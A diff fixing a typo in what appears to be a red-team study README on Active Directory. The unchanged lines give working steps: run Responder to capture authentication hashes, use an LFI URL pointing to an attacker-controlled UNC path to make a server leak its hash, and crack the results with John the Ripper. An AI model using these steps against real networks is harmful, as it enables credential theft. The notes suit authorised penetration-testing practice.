lw8192/Red-Team-Rising/ActiveDirectory/ReadMe.md

      sudo responder.py -I eth0   #start on specified interface.
 Hashes will be captured when a device tries to authenticate to resources on the network.

 You might be able to use a LFI vulnerability to request a resource and capture a hash using Responder.
 Ex - http://site.com/?page=//10.10.14.25/somefile
-Captured hashes will be stored in the logs folder, in a .txt file named for the protcol-hash type- and IP captured from.
+Captured hashes will be stored in the logs folder, in a .txt file named for the protocol-hash type- and IP captured from.
 Crack Hashes from responder:

     john hashes.txt   #John the Ripper will automatically detect the format of hashes collected by Responder.